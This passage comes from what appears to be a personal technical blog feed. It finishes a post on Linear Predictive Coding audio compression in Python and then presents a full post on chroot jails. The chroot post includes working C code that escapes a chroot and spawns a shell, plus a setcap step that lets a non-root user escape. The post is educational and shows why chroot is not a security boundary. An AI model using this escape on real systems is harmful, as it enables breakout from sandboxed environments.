class="p">):</span> <span class="n">B_hat</span><span class="p">[</span><span class="n">i</span><span class="p">,:]</span> <span class="o">=</span> <span class="n">run_source_filter</span><span class="p">(</span><span class="n">A</span><span class="p">[:,</span> <span class="n">i</span><span class="p">],</span> <span class="n">G</span><span class="p">[:,</span> <span class="n">i</span><span class="p">],</span> <span class="n">nw</span><span class="p">)</span> <span class="c1"># recover signal from blocks </span> <span class="n">x_hat</span> <span class="o">=</span> <span class="n">add_overlapping_blocks</span><span class="p">(</span><span class="n">B_hat</span><span class="p">);</span> <span class="k">return</span> <span class="n">x_hat</span></code></pre></figure> <p>One major difference from  is that they re-apply the window over the decode signal, that is,</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="n">B_hat</span><span class="p">[</span><span class="n">i</span><span class="p">,:]</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">multiply</span><span class="p">(</span><span class="n">w</span><span class="p">.</span><span class="n">T</span><span class="p">,</span> <span class="n">B_hat</span><span class="p">[</span><span class="n">i</span><span class="p">,:])</span></code></pre></figure> <p>My understanding is that we already applied these weights in <code class="language-plaintext highlighter-rouge">add_overlapping_blocks()</code> when generating the blocks, before encoding, so when we decode the signal would already be weighted.</p> <p>Skipping this step didn’t seem to yield any difference in the output.</p> <h2 id="experiment">Experiment</h2> <p>We’ve defined all the building blocks, so we’re now ready to define our experiment by putting them all together.</p> <h3 id="putting-it-all-together">Putting it all together</h3> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="p">[</span><span class="n">sample_rate</span><span class="p">,</span> <span class="n">amplitudes</span><span class="p">]</span> <span class="o">=</span> <span class="n">scipy</span><span class="p">.</span><span class="n">io</span><span class="p">.</span><span class="n">wavfile</span><span class="p">.</span><span class="n">read</span><span class="p">(</span><span class="s">'lpc/audio/speech.wav'</span><span class="p">)</span> <span class="n">amplitudes</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">array</span><span class="p">(</span><span class="n">amplitudes</span><span class="p">)</span> <span class="c1"># normalize </span><span class="n">amplitudes</span> <span class="o">=</span> <span class="mf">0.9</span><span class="o">*</span><span class="n">amplitudes</span><span class="o">/</span><span class="nb">max</span><span class="p">(</span><span class="nb">abs</span><span class="p">(</span><span class="n">amplitudes</span><span class="p">));</span> <span class="c1"># resampling to 8kHz </span><span class="n">target_sample_rate</span> <span class="o">=</span> <span class="mi">8000</span> <span class="n">target_size</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">amplitudes</span><span class="p">)</span><span class="o">*</span><span class="n">target_sample_rate</span><span class="o">/</span><span class="n">sample_rate</span><span class="p">)</span> <span class="n">amplitudes</span> <span class="o">=</span> <span class="n">resample</span><span class="p">(</span><span class="n">amplitudes</span><span class="p">,</span> <span class="n">target_size</span><span class="p">)</span> <span class="n">sample_rate</span> <span class="o">=</span> <span class="n">target_sample_rate</span> <span class="c1"># 30ms Hann window </span><span class="n">sym</span> <span class="o">=</span> <span class="bp">False</span> <span class="c1"># periodic </span><span class="n">w</span> <span class="o">=</span> <span class="n">hann</span><span class="p">(</span><span class="n">floor</span><span class="p">(</span><span class="mf">0.03</span><span class="o">*</span><span class="n">sample_rate</span><span class="p">),</span> <span class="n">sym</span><span class="p">)</span> <span class="c1"># Encode </span><span class="n">p</span> <span class="o">=</span> <span class="mi">6</span> <span class="c1"># number of poles </span><span class="p">[</span><span class="n">A</span><span class="p">,</span> <span class="n">G</span><span class="p">]</span> <span class="o">=</span> <span class="n">lpc_encode</span><span class="p">(</span><span class="n">amplitudes</span><span class="p">,</span> <span class="n">p</span><span class="p">,</span> <span class="n">w</span><span class="p">)</span> <span class="c1"># Print stats </span><span class="n">original_size</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">amplitudes</span><span class="p">)</span> <span class="n">model_size</span> <span class="o">=</span> <span class="n">A</span><span class="p">.</span><span class="n">size</span> <span class="o">+</span> <span class="n">G</span><span class="p">.</span><span class="n">size</span> <span class="k">print</span><span class="p">(</span><span class="s">'Original signal size:'</span><span class="p">,</span> <span class="n">original_size</span><span class="p">)</span> <span class="k">print</span><span class="p">(</span><span class="s">'Encoded signal size:'</span><span class="p">,</span> <span class="n">model_size</span><span class="p">)</span> <span class="k">print</span><span class="p">(</span><span class="s">'Data reduction:'</span><span class="p">,</span> <span class="n">original_size</span><span class="o">/</span><span class="n">model_size</span><span class="p">)</span> <span class="n">xhat</span> <span class="o">=</span> <span class="n">lpc_decode</span><span class="p">(</span><span class="n">A</span><span class="p">,</span> <span class="n">G</span><span class="p">,</span> <span class="n">w</span><span class="p">)</span> <span class="n">scipy</span><span class="p">.</span><span class="n">io</span><span class="p">.</span><span class="n">wavfile</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"example.wav"</span><span class="p">,</span> <span class="n">sample_rate</span><span class="p">,</span> <span class="n">xhat</span><span class="p">)</span> <span class="k">print</span><span class="p">(</span><span class="s">'done'</span><span class="p">)</span></code></pre></figure> <p>The full code is available as a <a href="https://github.com/kunigami/kunigami.github.io/blob/master/blog/code/2021-05-13-lpc-in-python/lpc.ipynb">Jupyter notebook</a>.</p> <h3 id="results">Results</h3> <p>Running with the audio <code class="language-plaintext highlighter-rouge">speech.wav</code> provided by , we obtained</p> <figure class="highlight"><pre><code class="language-text" data-lang="text">Original signal size: 96,249 (floats) Encoded signal size: 5,607 (floats) Data reduction: 17x</code></pre></figure> <figure class="center_children"> <img src="https://www.kuniga.me/resources/blog/2021-05-13-lpc-in-python/comparison.png" alt="Line chart with 2 series, displaying the original signal vs the decoded signal." /> <figcaption>Figure 3: Original signal (red) vs. Decoded signal (blue).</figcaption> </figure> <h2 id="conclusion">Conclusion</h2> <p>In this post we learned how to implement the LPC method for encoding and decoding in Python. As always, having to implement an algorithm made me understand it in much more depth, including the source-filter model.</p> <p>This is the first time I deal with signal processing and there was a lot of concepts to learn. Hopefully my newbie perspective is helpful to other people starting on this area without formal training.</p> <p>Digital filters seem like a vast area and something I’m interested in digging into .</p> <h2 id="appendix-converting-matlab-to-python">Appendix: Converting Matlab to Python</h2> <p>I struggled a lot to make the Python code work, even when I had a working version of the Matlab code running throught Octave.</p> <p>In dealing with multi-dimensional numerical applications like this, it’s very easy to get dimensions wrong because the APIs sometimes are permissive and do different things depending on the dimensions of the data we pass in. It is hard to validate intermediate results because they might not have a clear interpretation, making it harder to debug.</p> <p>A few techniques were extremely helpful for debugging, leveraging the fact I had the Octave code. The idea is to compare intermediate results.</p> <p><strong>CSV exports/import.</strong> Due to differences in implementation and random number generation, it’s impossible to compare values - one idea is to save intermediate results into a CSV file from Octave then load into Python. If this happens inside a loop we pick a specific index.</p> <p><strong>Histogram of the data.</strong> A simpler technique, especially if there are no randomness involved is to display a histogram of the values in the matrix in both Python and Octave:</p> <figure class="highlight"><pre><code class="language-text" data-lang="text">print('x', np.histogram(x.flatten()))</code></pre></figure> <p>Numpy and Octave use the same number of buckets by default but choose the bucket label differently. It’s still useful for checking the number of elements in each bucket.</p> <p><strong>Visualizing.</strong> Another way to compare results is to plot the data in a timeseries. Even when randomness is involved the overall shape between Python and Octave should resemble each other.</p> <h2 id="related-posts">Related Posts</h2> <p><a href="(https://www.kuniga.me/blog/2020/02/20/levinson-recursion.html)">Levinson Recursion</a> - The whole reason we studied the Levinson Recursion algorithm is for the Linear Predicitve Coding algorithm. The matrix returned by <code class="language-plaintext highlighter-rouge">make_matrix_X()</code> is a Toeplitz once, but it’s not a square one. I haven’t found references on how to adapt the Levinson algorithm for non-square matrices.</p> <h2 id="references">References</h2> <ul> <li>[<a href="https://ccrma.stanford.edu/~hskim08/lpc">1</a>] Linear Predictive Coding is All-Pole Resonance Modeling - Hyung-Suk Kim</li> <li>[<a href="https://dsp.stackexchange.com/questions/22107/why-is-telephone-audio-sampled-at-8-khz">2</a>] Signal Processing: Why is telephone audio sampled at 8 kHz?</li> <li>[<a href="https://en.wikipedia.org/wiki/Window_function#Comparison_of_windows">3</a>] Wikipedia: Window Functions, Comparison of windows</li> <li>[<a href="https://www.mathworks.com/matlabcentral/answers/94503-what-is-the-periodic-sampling-option-in-the-hamming-function-used-for-in-signal-processing-toolbox">4</a>] MathWorks - What is the ‘periodic’ sampling option in the HAMMING function?</li> <li>[<a href="https://ccrma.stanford.edu/~jos/filters/filters.html">5</a>] Digital Filters</li> </ul>Guilherme KunigamiLinear Predictive Coding (LPC) is a method for estimating the coefficients of a Source-Filter model (post) from a given data. The input consists of a time-series representing amplitudes of speech collected at fixed intervals over a period of time. The output is a matrix of coefficients corresponding to the source and filter model and is much more compact, so this method can be used for compressing audio. In this post we’ll study the encoding of a audio signal using LPC, which can achieve 15x compression. We’ll then decode it into a very noisy but intelligible speech.Chroot Jailing2021-04-19T00:00:00+00:002021-04-19T00:00:00+00:00https://www.kuniga.me/blog/2021/04/19/chroot-jail<!-- This needs to be define as included html because variables are not inherited by Jekyll pages --> <p>In this post we’ll study how to use the utlity <code class="language-plaintext highlighter-rouge">chroot</code> to create a jailed environment. We’ll also cover some security holes with this approach.</p> <!--more--> <h2 id="a-simple-chroot-environment">A Simple Chroot Environment</h2> <p>The <code class="language-plaintext highlighter-rouge">chroot</code> command can be used to redefine the filesystem tree root as a new directory . If we want a directory, say <code class="language-plaintext highlighter-rouge">$HOME/root/</code>, to be our new root, we can start a bash shell as:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nb">mkdir</span> <span class="nv">$HOME</span>/root/ <span class="nb">sudo chroot</span> <span class="nv">$HOME</span>/root/</code></pre></figure> <p>This will fail with:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nb">chroot</span>: failed to run <span class="nb">command</span> ‘/bin/bash’: No such file or directory</code></pre></figure> <p>The problem is that because <code class="language-plaintext highlighter-rouge">$HOME/root/</code> is empty, there are no binaries available, so we won’t be able to do much.</p> <p>We can use a simple Bash script to copy the binaries and their dependencies to the new root directory.</p> <p><code class="language-plaintext highlighter-rouge">setup.sh</code>:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="c"># binaries we want in our chroot</span> <span class="nv">bins</span><span class="o">=(</span> <span class="s2">"/bin/bash"</span> <span class="s2">"/bin/ls"</span> <span class="s2">"/bin/mkdir"</span> <span class="o">)</span> <span class="nv">NEW_ROOT</span><span class="o">=</span><span class="s2">"</span><span class="nv">$HOME</span><span class="s2">/root"</span> <span class="k">for </span>bin_file <span class="k">in</span> <span class="s2">"</span><span class="k">${</span><span class="nv">bins</span><span class="p">[@]</span><span class="k">}</span><span class="s2">"</span> <span class="k">do</span> <span class="c"># copy binaries</span> <span class="nv">bin_dir</span><span class="o">=</span><span class="si">$(</span><span class="nb">dirname</span> <span class="nv">$bin_file</span><span class="si">)</span> <span class="nb">mkdir</span> <span class="nt">-p</span> <span class="nv">$NEW_ROOT$bin_dir</span> <span class="nb">cp</span> <span class="nv">$bin_file</span> <span class="nv">$NEW_ROOT$bin_dir</span> <span class="nv">deps</span><span class="o">=</span><span class="si">$(</span>ldd <span class="nv">$bin_file</span><span class="si">)</span> <span class="c"># copy dependencies from binaries</span> <span class="k">while </span><span class="nb">read</span> <span class="nt">-r</span> dep<span class="p">;</span> <span class="k">do</span> <span class="c"># ldd returns too much info. we're only interested</span> <span class="c"># in the actual files</span> <span class="nv">dep_file</span><span class="o">=</span><span class="si">$(</span><span class="nb">echo</span> <span class="nv">$dep</span> | <span class="nb">grep</span> <span class="nt">-o</span> <span class="s2">"</span><span class="se">\/</span><span class="s2">[a-z0-9_</span><span class="se">\.\/\-</span><span class="s2">]*"</span><span class="si">)</span> <span class="k">if</span> <span class="o">[</span> <span class="o">!</span> <span class="nt">-z</span> <span class="s2">"</span><span class="nv">$dep_file</span><span class="s2">"</span> <span class="o">]</span> <span class="k">then </span><span class="nv">dep_dir</span><span class="o">=</span><span class="si">$(</span><span class="nb">dirname</span> <span class="nv">$dep_file</span><span class="si">)</span> <span class="nb">mkdir</span> <span class="nt">-p</span> <span class="nv">$NEW_ROOT$dep_dir</span> <span class="nb">cp</span> <span class="nv">$dep_file</span> <span class="nv">$NEW_ROOT$dep_dir</span> <span class="k">fi done</span> <span class="o">&lt;&lt;&lt;</span> <span class="s2">"</span><span class="nv">$deps</span><span class="s2">"</span> <span class="k">done</span></code></pre></figure> <p>This adds <code class="language-plaintext highlighter-rouge">/bin/bash</code>, <code class="language-plaintext highlighter-rouge">/bin/ls</code>, <code class="language-plaintext highlighter-rouge">/bin/mkdir</code> and their dependencies to the chroot environment. We can now do:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">./setup.sh <span class="nb">sudo chroot</span> <span class="nv">$HOME</span>/root/ /bin/bash</code></pre></figure> <p>and in there, inspect the root directory:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$</span><span class="nb">ls</span> / bin lib lib64</code></pre></figure> <p>note we can’t go beyond that:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$ </span><span class="nb">cd</span> / <span class="nv">$</span><span class="nb">cd</span> .. <span class="nv">$ </span><span class="nb">ls </span>bin lib lib64</code></pre></figure> <p>It’s worth noting that <code class="language-plaintext highlighter-rouge">chroot</code> does not clone the subtree under the new root in any way. <code class="language-plaintext highlighter-rouge">chroot</code> seems to only impose restrictions on accesses above the new root.</p> <p>We can verify that by creating a new directory inside the jailed environment:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$mkdir</span> hello</code></pre></figure> <p>If we exit the <code class="language-plaintext highlighter-rouge">chroot</code> (e.g. with <code class="language-plaintext highlighter-rouge">ctrl+d</code>) and return to the original process, we’ll see the directory is still in <code class="language-plaintext highlighter-rouge">$HOME/root/</code>.</p> <h2 id="escaping-chroot">Escaping chroot</h2> <p>It’s possible to “escape” from a <code class="language-plaintext highlighter-rouge">chroot</code>ed environment if we have root access and a C binary smuggled in.  provides the following code (comments added):</p> <p><code class="language-plaintext highlighter-rouge">escape.c</code>:</p> <figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#include &lt;sys/stat.h&gt; #include &lt;unistd.h&gt; #include &lt;fcntl.h&gt; #include &lt;stdio.h&gt; </span> <span class="cp">#define TEMP_DIR "hole" </span> <span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span> <span class="kt">int</span> <span class="n">dir_fd</span><span class="p">,</span> <span class="n">i</span><span class="p">;</span> <span class="n">mkdir</span><span class="p">(</span><span class="n">TEMP_DIR</span><span class="p">,</span> <span class="mo">0755</span><span class="p">);</span> <span class="c1">// grab a reference to the current directory</span> <span class="c1">// since chroot() will change it</span> <span class="n">dir_fd</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="s">"."</span><span class="p">,</span> <span class="n">O_RDONLY</span><span class="p">);</span> <span class="n">chroot</span><span class="p">(</span><span class="n">TEMP_DIR</span><span class="p">);</span> <span class="c1">// chroot didn't close the dir_fd, so we can</span> <span class="c1">// use it to switch back to the previous</span> <span class="c1">// directory</span> <span class="n">fchdir</span><span class="p">(</span><span class="n">dir_fd</span><span class="p">);</span> <span class="n">close</span><span class="p">(</span><span class="n">dir_fd</span><span class="p">);</span> <span class="c1">// climb up to the top of the directory enough times</span> <span class="k">for</span><span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">1000</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span> <span class="n">chdir</span><span class="p">(</span><span class="s">".."</span><span class="p">);</span> <span class="p">}</span> <span class="n">chroot</span><span class="p">(</span><span class="s">"."</span><span class="p">);</span> <span class="k">return</span> <span class="n">execl</span><span class="p">(</span><span class="s">"/bin/sh"</span><span class="p">,</span> <span class="s">"-i"</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span> <span class="p">}</span></code></pre></figure> <p>The exploit seems to rely on a behavior of <code class="language-plaintext highlighter-rouge">chroot</code> which removes whatever restrictions from the current chroot environment once a new one is created, so if we have a reference to the directory from the first chroot, it’s possible to climb up to the root directory of the original process.</p> <figure class="center_children"> <img src="https://www.kuniga.me/resources/blog/2021-04-19-chroot-jail/escape.jpeg" alt="Men looking through a tunnel: scene from Shawshank Redemption" /> <figcaption>Scene from <i>Shawshank Redemption</i></figcaption> </figure> <p>Before doing the chroot, we compile and add the binary to the chroot target directory:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">./setup.sh gcc <span class="nt">-static</span> escape.c <span class="nt">-o</span> <span class="nv">$HOME</span>/root/escape <span class="nb">sudo chroot</span> <span class="nv">$HOME</span>/root/ /bin/bash</code></pre></figure> <p>Inside the chroot:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">./escape <span class="nb">ls</span></code></pre></figure> <p>which should display the contents from the original process.</p> <h2 id="chroot-for-non-root">Chroot for non-root</h2> <p>By default, the chroot process has root privileges, but it’s possible to start it as a specific user and group, so that we restrict what operations can be performed inside the chroot. For example, if <code class="language-plaintext highlighter-rouge">test_user</code> is a user we want make a chroot to for, we can do:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nb">sudo chroot</span> <span class="nt">--userspec</span> <span class="s2">"test_user:test_user"</span> <span class="nv">$HOME</span>/root/ /bin/bash</code></pre></figure> <p>The problem is that since the owner of <code class="language-plaintext highlighter-rouge">$HOME/root/</code> is not <code class="language-plaintext highlighter-rouge">test_user</code>, they won’t be able to do anything. We can create a <code class="language-plaintext highlighter-rouge">home</code> folder for them:</p> <p><code class="language-plaintext highlighter-rouge">setup.sh</code>:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">... <span class="nb">mkdir</span> <span class="nt">-p</span> <span class="nv">$NEW_ROOT</span><span class="s2">"/home"</span> <span class="nb">sudo chown </span>test_user:test_user <span class="nv">$NEW_ROOT</span><span class="s2">"/home"</span></code></pre></figure> <p>We then generate the <code class="language-plaintext highlighter-rouge">escape</code> binary in the new home:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">./setup.sh gcc <span class="nt">-static</span> escape.c <span class="nt">-o</span> <span class="nv">$HOME</span>/root/escape/home <span class="nb">sudo chroot</span> <span class="s2">"test_user:test_user"</span> <span class="nv">$HOME</span>/root/ /bin/bash</code></pre></figure> <p>Inside the chroot:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">home/./escape <span class="nb">ls</span></code></pre></figure> <p>Since <code class="language-plaintext highlighter-rouge">chroot</code> requires root privileges, they won’t be able to break out of the jail using the <code class="language-plaintext highlighter-rouge">escape</code> binary, so <code class="language-plaintext highlighter-rouge">ls</code> should still show the jailed directories.</p> <h2 id="cap_sys_chroot-capability">CAP_SYS_CHROOT capability</h2> <p>There’s a more granular permission model than root which is called capabilities. It’s possible to grant capabilities to binaries so they can perform operations even without root privileges.</p> <p>One of them is the ability to run <code class="language-plaintext highlighter-rouge">chroot</code>, the <code class="language-plaintext highlighter-rouge">CAP_SYS_CHROOT</code> capability. We can add it to our smuggled binary.</p> <p><code class="language-plaintext highlighter-rouge">setup.sh</code>:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">... gcc <span class="nt">-static</span> escape.c <span class="nt">-o</span> <span class="nv">$HOME</span>/root/escape/home <span class="nb">sudo </span>setcap <span class="s1">'cap_sys_chroot+ep'</span> <span class="nv">$NEW_ROOT</span><span class="s2">"/home/escape"</span></code></pre></figure> <p>Now <code class="language-plaintext highlighter-rouge">test_user</code> we’ll be able to escape the jail even without root privileges.</p> <p>This makes it hard to detect if there’s a vulnerability inside a chroot environment. Hence it seems to be a general recommendation to not rely on chroot for security purposes .</p> <h2 id="code">Code</h2> <p>The full code for <a href="https://github.com/kunigami/kunigami.github.io/blob/master/blog/code/2021-04-19-chroot-jail/escape.c">escape.c</a> and <a href="https://github.com/kunigami/kunigami.github.io/blob/master/blog/code/2021-04-19-chroot-jail/setup.sh">setup.sh</a> are available on <a href="https://github.com/kunigami/kunigami.github.io/blob/master/blog/code/2021-04-19-chroot-jail">Github</a>.</p> <h2 id="references">References</h2> <ul> <li>[<a href="https://en.wikipedia.org/wiki/Chroot">1</a>] Wikipedia - Chroot</li> <li>[<a href="https://filippo.io/escaping-a-chroot-jail-slash-1/">2</a>] Escaping a chroot jail/1</li> <li>[<a href="https://unix.stackexchange.com/questions/105/chroot-jail-what-is-it-and-how-do-i-use-it#comment36_109">3</a>] Unix &amp; Linux: chroot “jail” - what is it and how do I use it?</li> </ul>Guilherme KunigamiIn this post we’ll study how to use the utlity chroot to create a jailed environment. We’ll also cover some security holes with this approach.